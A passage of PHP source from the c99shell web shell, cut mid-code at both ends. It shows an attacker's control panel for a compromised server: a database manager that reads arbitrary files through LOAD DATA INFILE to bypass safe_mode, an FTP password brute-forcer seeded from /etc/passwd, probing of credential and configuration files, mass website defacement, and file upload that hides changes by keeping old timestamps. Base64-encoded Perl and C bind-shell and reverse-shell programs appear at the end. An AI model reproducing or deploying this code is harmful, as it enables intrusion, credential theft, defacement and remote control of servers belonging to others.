$set["nl2br"] = 1;

}

$set["file"] = $dump_file;

$set["add_drop"] = true;

$ret = mysql_dump($set);

if ($dump_out == "download") {exit;}

}

else

{

$result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error());

echo "

echo "

echo "

";

echo "

Table
";

echo "

Rows";

echo "

Type";

echo "

Created";

echo "

Modified";

echo "

Size";

echo "

Action";

echo "

";

$i = 0;

$tsize = $trows = 0;

while ($row = mysql_fetch_array($result, MYSQL_NUM))

{

$tsize += $row["5"];

$trows += $row["5"];

$size = view_size($row["5"]);

echo "

";

echo "

";

echo "

  ".$row[0]." ";

echo "

".$row[3]."";

echo "

".$row[1]."";

echo "

".$row[10]."";

echo "

".$row[11]."";

echo "

".$size."";

echo "

 %5C%22%22.%24surl.%22act=img&img=sql_button_empty%5C%22

 %5C%22%22.%24surl.%22act=img&img=sql_button_drop%5C%22

%5C%22%22.%24surl.%22act=img&img=sql_button_insert%5C%22 

";

echo "

";

$i++;

}

echo "

";

echo "

»
";

echo "

".$i." table(s)
";

echo "

".$trows."";

echo "

".$row[1]."";

echo "

".$row[10]."";

echo "

".$row[11]."";

echo "

".view_size($tsize)."";

echo "

";

echo "

";

echo "


%5C%22%22.%24surl.%22act=img&img=arrow_ltr%5C%22

With selected:

Drop

Empty

Check table

Optimize table

Repair table

Analyze table

 ";

mysql_free_result($result);

}

}

}

else

{

$acts = array("","newdb","serverstat","servervars","processes","getfile");

if (in_array($sql_act,$acts))

{

?>

Create new DB: View File: 
<?php

}

if (!empty($sql_act))

{

echo "


";

if ($sql_act == "newdb")

{

echo "";

if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
";}

else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason: ".mysql_error();}

}

if ($sql_act == "serverstatus")

{

$result = mysql_query("SHOW STATUS", $sql_sock);

echo "

Server-status variables:
";

echo "

Name value";

while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "

".$row[0]."".$row[1]."";}

echo "

";

mysql_free_result($result);

}

if ($sql_act == "servervars")

{

$result = mysql_query("SHOW VARIABLES", $sql_sock);

echo "

Server variables:
";

echo "

Name value";

while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "

".$row[0]."".$row[1]."";}

echo "

";

mysql_free_result($result);

}

if ($sql_act == "processes")

{

if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";}

$result = mysql_query("SHOW PROCESSLIST", $sql_sock);

echo "

Processes:
";

echo "

ID USER HOST DB COMMAND TIMESTATE INFO Action";

while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "

".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]." Kill";}

echo "

";

mysql_free_result($result);

}

elseif (($sql_act == "getfile"))

{

if (!mysql_create_db("tmp_bd")) {echo mysql_error();}

elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}

elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}

else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}

else

{

for ($i=0;$i

$f = "";

while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}

if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!";}

else {echo "File \"".$sql_getfile."\":
".nl2br(htmlspecialchars($f));}

}

mysql_free_result($result);

if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}

}

}

}

}

}

echo "

";

}

if ($act == "mkdir")

{

if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}}

echo "
";

$act = $dspact = "ls";

}

if ($act == "ftpquickbrute")

{

echo "Ftp Quick brute:
";

if ($win) {echo "This functions not work in Windows!
";}

else

{

function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)

{

if ($fqb_onlywithsh)

{

if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}

else {$true = true;}

}

else {$true = true;}

if ($true)

{

$sock = @ftp_connect($host,$port,$timeout);

if (@ftp_login($sock,$login,$pass))

{

echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
";

ob_flush();

return true;

}

}

}

if (!empty($submit))

{

if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}

$fp = fopen("/etc/passwd","r");

if (!$fp) {echo "Can't get /etc/passwd for password-list.";}

else

{

ob_flush();

$i = $success = 0;

$ftpquick_st = getmicrotime();

while(!feof($fp))

{

$str = explode(":",fgets($fp,2048));

if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))

{

$success++;

}

if ($i > $fqb_lenght) {break;}

$i++;

}

if ($success == 0) {echo "No success. connections!";}

$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);

echo "


Done!
Total time (secs.): ".$ftpquick_t."
Total connections: ".$i."
Success.: ".$success."
Unsuccess.:".($i-$success)."
Connects per second: ".round($i/$ftpquick_t,2)."
";

}

}

else {echo "


Read first:
Users only with shell? ";}

}

}

if ($act == "lsa")

{

echo "

Server security information:
";

echo "Software: ".PHP_OS.", ".$SERVER_SOFTWARE."
";

echo "Safe-Mode: ".$hsafemode."
";

echo "Open base dir: ".$hopenbasedir."
";

if (!$win)

{

if ($nixpasswd)

{

if ($nixpasswd == 1) {$nixpasswd = 0;}

$num = $nixpasswd + $nixpwdperpage;

echo "*nix /etc/passwd:
";

$i = $nixpasswd;

while ($i < $num)

{

$uid = posix_getpwuid($i);

if ($uid) {echo join(":",$uid)."
";}

$i++;

}

}

else {echo "Get /etc/passwd
";}

if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
";}

if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
";}

if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
";}

if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
";}

}

else

{

$v = $_SERVER["WINDIR"]."\repair\sam";

if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
";}

else {echo "You can crack winnt passwords. Download, and use lcp.crack+.
";}

}

}

if ($act == "mkfile")

{

if ($mkfile != $d)

{

if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";}

elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";}

else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}

}

else {$act = $dspact = "ls";}

}

if ($act == "fsbuff")

{

$arr_copy = $sess_data["copy"];

$arr_cut = $sess_data["cut"];

$arr = array_merge($arr_copy,$arr_cut);

if (count($arr) == 0) {echo "

Buffer is empty!
";}

else

{

echo "File-System buffer
";

$ls_arr = $arr;

$disp_fullpath = true;

$act = "ls";

}

}

if ($act == "selfremove")

{

if (!empty($submit))

{

if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }

else {echo "

Can't delete ".__FILE__."!
";}

}

else

{

$v = array();

for($i=0;$i<8;$i++) {$v[] = "NO";}

$v[] = "YES";

shuffle($v);

$v = join("   ",$v);

echo "Self-remove: ".__FILE__."
Are you sure?

".$v."
";

}

}

if ($act == "massdeface")

{

if (empty($deface_in)) {$deface_in = $d;}

if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}

if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}

if (!empty($submit))

{

$found = array();

$found_d = 0;

$found_f = 0;

$text = $deface_text;

$text_regexp = $deface_text_regexp;

if (empty($text)) {$text = " "; $text_regexp = 1;}

$a = array

(

"name"=>$deface_name, "name_regexp"=>$deface_name_regexp,

"text"=>$text, "text_regexp"=>$text_regxp,

"text_wwo"=>$deface_text_wwo,

"text_cs"=>$deface_text_cs,

"text_not"=>$deface_text_not

);

$defacetime = getmicrotime();

$in = array_unique(explode(";",$deface_in));

foreach($in as $v) {c99fsearch($v);}

$defacetime = round(getmicrotime()-$defacetime,4);

if (count($found) == 0) {echo "No files found!";}

else

{

$ls_arr = $found;

$disp_fullpath = true;

$act = $dspact = "ls";

}

}

else

{

if (empty($deface_preview)) {$deface_preview = 1;}

if (empty($deface_html)) {$deface_html = "


Mass-defaced with c99shell v. ".$shver.", coded by tristram[ CCTeaM].";}

}

echo "

";

if (!$submit) {echo "Attention! It's a very dangerous feature, you may lost your data.
";}

echo "

Deface for (file/directory name):   - regexp

Deface in (explode \";\"):

Search text:".htmlspecialchars($deface_text)."

- regexp

   - whole words only

   - case sensitive

   - find files NOT containing the text

- PREVIEW AFFECTED FILES

Html of deface:".htmlspecialchars($deface_html)."

";

if ($act == "ls") {echo "


Deface took ".$defacetime." secs
";}

}

if ($act == "search")

{

if (empty($search_in)) {$search_in = $d;}

if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}

if (empty($search_text_wwo)) {$search_text_regexp = 0;}

if (!empty($submit))

{

$found = array();

$found_d = 0;

$found_f = 0;

$a = array

(

"name"=>$search_name, "name_regexp"=>$search_name_regexp,

"text"=>$search_text, "text_regexp"=>$search_text_regxp,

"text_wwo"=>$search_text_wwo,

"text_cs"=>$search_text_cs,

"text_not"=>$search_text_not

);

$searchtime = getmicrotime();

$in = array_unique(explode(";",$search_in));

foreach($in as $v)

{

c99fsearch($v);

}

$searchtime = round(getmicrotime()-$searchtime,4);

if (count($found) == 0) {echo "No files found!";}

else

{

$ls_arr = $found;

$disp_fullpath = true;

$act = $dspact = "ls";

}

}

echo "

Search for (file/directory name):   - regexp

Search in (explode \";\"):

Text:".htmlspecialchars($search_text)."

- regexp

   - whole words only

   - case sensitive

   - find files NOT containing the text

";

if ($act == "ls") {echo "


Search took ".$searchtime." secs
";}

}

if ($act == "chmod")

{

$perms = fileperms($d.$f);

if (!$perms) {echo "Can't get current mode.";}

elseif ($submit)

{

if (!isset($owner[0])) {$owner[0] = 0;}

if (!isset($owner[1])) {$owner[1] = 0; }

if (!isset($owner[2])) {$owner[2] = 0;}

if (!isset($group[0])) {$group[0] = 0;}

if (!isset($group[1])) {$group[1] = 0;}

if (!isset($group[2])) {$group[2] = 0;}

if (!isset($world[0])) {$world[0] = 0;}

if (!isset($world[1])) {$world[1] = 0;}

if (!isset($world[2])) {$world[2] = 0;}

$sum_owner = $owner[0] + $owner[1] + $owner[2];

$sum_group = $group[0] + $group[1] + $group[2];

$sum_world = $world[0] + $world[1] + $world[2];

$sum_chmod = "0".$sum_owner.$sum_group.$sum_world;

$ret = @chmod($d.$f, $sum_chmod);

if ($ret) {$act = "ls";}

else {echo "Changing file-mode (".$d.$f."): error
";}

}

else

{

echo "Changing file-mode
";

$perms = view_perms(fileperms($d.$f));

$length = strlen($perms);

$owner_r = $owner_w = $owner_x =

$group_r = $group_w = $group_x =

$world_r = $world_w = $group_x = "";

if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}

if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}

if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}

if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}

if ($perms[9] == "x") {$world_x = " checked";}

echo "

Owner

ReadWrite

Execute

Group

Read

Write

Execute

WorldRead

Write

Execute

";

}

}

if ($act == "upload")

{

$uploadmess = "";

$uploadpath = str_replace("\\","/",$uploadpath);

if (empty($uploadpath)) {$uploadpath = $d;}

elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}

if (!empty($submit))

{

global $HTTP_POST_FILES;

$uploadfile = $HTTP_POST_FILES["uploadfile"];

if (!empty($uploadfile[tmp_name]))

{

if (empty($uploadfilename)) {$destin = $uploadfile[name];}

else {$destin = $userfilename;}

if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!
";}

}

elseif (!empty($uploadurl))

{

if (!empty($uploadfilename)) {$destin = $uploadfilename;}

else

{

$destin = explode("/",$destin);

$destin = $destin[count($destin)-1];

if (empty($destin))

{

$i = 0;

$b = "";

while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}

}

if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";}

else

{

$st = getmicrotime();

$content = @file_get_contents($uploadurl);

$dt = round(getmicrotime()-$st,4);

if (!$content) {$uploadmess .= "Can't download file!
";}

else

{

if ($filestealth) {$stat = stat($uploadpath.$destin);}

$fp = fopen($uploadpath.$destin,"w");

if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
";}

else

{

fwrite($fp,$content,strlen($content));

fclose($fp);

if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}

}

}

}

}

}

if ($miniform)

{

echo "".$uploadmess."";

$act = "ls";

}

else

{

echo "File upload:".$uploadmess."

Select file on your local computer:
               or

Input URL:

Save this file dir:

File-name (auto-fill):

 convert file name to lovercase

";

}

}

if ($act == "delete")

{

$delerr = "";

foreach ($actbox as $v)

{

$result = false;

$result = fs_rmobj($v);

if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
";}

if (!empty($delerr)) {echo "Deleting with errors:
".$delerr;}

}

$act = "ls";

}

if ($act == "deface")

{

$deferr = "";

foreach ($actbox as $v)

{

$data = $deface_html;

if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}

$data = str_replace("%%%filename%%%",basename($v),$data);

$data = str_replace("%%%filepath%%%",$v,$data);

$fp = @fopen($v,"w");

fwrite($fp,$data);

fclose($fp);

if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."
";}

if (!empty($delerr)) {echo "Defacing with errors:
".$deferr;}

}

}

if (!$usefsbuff)

{

if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "

Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.
";}

}

else

{

if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}

if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}

if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}

if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}

elseif ($actpastebuff)

{

$psterr = "";

foreach($sess_data["copy"] as $k=>$v)

{

$to = $d.basename($v);

if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
";}

if ($copy_unset) {unset($sess_data["copy"][$k]);}

}

foreach($sess_data["cut"] as $k=>$v)

{

$to = $d.basename($v);

if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
";}

unset($sess_data["cut"][$k]);

}

c99_sess_put($sess_data);

if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;}

$act = "ls";

}

elseif ($actarcbuff)

{

$arcerr = "";

if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}

else {$ext = ".tar.gz";}

if ($ext == ".tar.gz")

{

$cmdline = "tar cfzv";

}

$objects = array_merge($sess_data["copy"],$sess_data["cut"]);

foreach($objects as $v)

{

$v = str_replace("\\","/",$v);

if (is_dir($v))

{

if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}

$v .= "*";

}

$cmdline .= " ".$v;

}

$ret = `$cmdline`;

if (empty($ret)) {$arcerr .= "Can't call archivator!
";}

$ret = str_replace("\r\n","\n");

$ret = explode("\n",$ret);

if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}

foreach($sess_data["cut"] as $k=>$v)

{

if (in_array($v,$ret)) {fs_rmobj($v);}

unset($sess_data["cut"][$k]);

}

c99_sess_put($sess_data);

if (!empty($arcerr)) {echo "Archivation errors:
".$arcerr;}

$act = "ls";

}

elseif ($actpastebuff)

{

$psterr = "";

foreach($sess_data["copy"] as $k=>$v)

{

$to = $d.basename($v);

if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
";}

if ($copy_unset) {unset($sess_data["copy"][$k]);}

}

foreach($sess_data["cut"] as $k=>$v)

{

$to = $d.basename($v);

if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
";}

unset($sess_data["cut"][$k]);

}

c99_sess_put($sess_data);

if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;}

$act = "ls";

}

}

if ($act == "ls")

{

if (count($ls_arr) > 0) {$list = $ls_arr;}

else

{

$list = array();

if ($h = @opendir($d))

{

while ($o = readdir($h)) {$list[] = $d.$o;}

closedir($h);

}

}

if (count($list) == 0) {echo "

Can't open directory (".htmlspecialchars($d).")!
";}

else

{

//Building array

$tab = array();

$amount = count($ld)+count($lf);

$vd = "f"; //Viewing mode

if ($vd == "f")

{

$row = array();

$row[] = "Name";

$row[] = "Size";

$row[] = "Modify";

if (!$win)

{$row[] = "Owner/Group";}

$row[] = "Perms";

$row[] = "Action";

$k = $sort[0];

if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}

if (empty($sort[1])) {$sort[1] = "d";}

if ($sort[1] != "a")

{

$y = "%5C%22%22.%24surl.%22act=img&img=sort_desc%5C%22";

}

else

{

$y = "%5C%22%22.%24surl.%22act=img&img=sort_asc%5C%22";

}

$row[$k] .= $y;

for($i=0;$i

{

if ($i != $k) {$row[$i] = "".$row[$i]."";}

}

$tab = array();

$tab[cols] = array($row);

$tab[head] = array();

$tab[dirs] = array();

$tab[links] = array();

$tab[files] = array();

foreach ($list as $v)

{

$o = basename($v);

$dir = dirname($v);

if ($disp_fullpath) {$disppath = $v;}

else {$disppath = $o;}

$disppath = str2mini($disppath,60);

if (in_array($v,$sess_data["cut"])) {$disppath = " ".$disppath." ";}

elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";}

$uo = urlencode($o);

$ud = urlencode($dir);

$uv = urlencode($v);

$row = array();

if ($o == ".")

{

$row[] = "%5C%22%22.%24surl.%22act=img&img=small_dir%5C%22 ".$o."";

$row[] = "LINK";

}

elseif ($o == "..")

{

$row[] = "%5C%22%22.%24surl.%22act=img&img=ext_lnk%5C%22 ".$o."";

$row[] = "LINK";

}

elseif (is_dir($v))

{

if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}

else {$type = "DIR";}

$row[] = "%5C%22%22.%24surl.%22act=img&img=small_dir%5C%22 [".$disppath."]";

$row[] = $type;

}

elseif(is_file($v))

{

$ext = explode(".",$o);

$c = count($ext)-1;

$ext = $ext[$c];

$ext = strtolower($ext);

$row[] = "%5C%22%22.%24surl.%22act=img&img=ext_%22.%24ext.%22%5C%22 ".$disppath."";

$row[] = view_size(filesize($v));

}

$row[] = date("d.m.Y H:i:s",filemtime($v));

if (!$win)

{

$ow = @posix_getpwuid(fileowner($v));

$gr = @posix_getgrgid(filegroup($v));

$row[] = $ow["name"]."/".$gr["name"];

}

if (is_writable($v)) {$row[] = "".view_perms(fileperms($v))."";}

else {$row[] = "".view_perms(fileperms($v))."";}

if (is_dir($v)) {$row[] = "%5C%22%22.%24surl.%22act=img&img=ext_diz%5C%22 ";}

else {$row[] = "%5C%22%22.%24surl.%22act=img&img=ext_diz%5C%22 %5C%22%22.%24surl.%22act=img&img=change%5C%22 %5C%22%22.%24surl.%22act=img&img=download%5C%22 ";}

if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}

elseif (is_link($v)) {$tab[links][] = $row;}

elseif (is_dir($v)) {$tab[dirs][] = $row;}

elseif (is_file($v)) {$tab[files][] = $row;}

}

}

$v = $sort[0];

function tabsort($a, $b)

{

global $v;

return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));

}

usort($tab[dirs], "tabsort");

usort($tab[files], "tabsort");

if ($sort[1] == "a")

{

$tab[dirs] = array_reverse($tab[dirs]);

$tab[files] = array_reverse($tab[files]);

}

//Compiling table

$table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);

echo "

Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):

";

echo "

foreach($table as $row)

{

echo "

\r\n";

foreach($row as $v) {echo "

".$v."\r\n";}

echo "

\r\n";

}

echo "


%5C%22%22.%24surl.%22act=img&img=arrow_ltr%5C%22";

if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))

{

echo "                   ";

}

echo "With selected:";

echo "Delete";

if ($usefsbuff)

{

echo "Cut";

echo "Copy";

echo "Unselect";

}

if ($dspact == "massdeface") {echo "Unselect";}

echo " 

";

echo "";

}

}

if ($act == "bind")

{

$bndsrcs = array(

"c99sh_bindport.pl"=>

"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".

"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".

"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".

"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".

"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".

"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".

"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".

"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".

"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".

"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",

"c99sh_bindport.c"=>

"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".

"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".

"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".

"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".

"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".

"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".

"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".

"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".

"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".

"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".

"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".

"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".

"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".

"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".

"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".

"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".

"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".

"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".

"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".

"fQ==",

"c99sh_backconn.pl"=>

"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".

"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".

"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".

"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".

"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".

"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".

"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".

"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".

"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".

"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",

"c99sh_backconn.c"=>

"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".

"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".

"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".

"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".

"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".

"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".

"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".

"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".

"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".

"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".

"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".

"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="

);

$bndportsrcs = array(

"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),

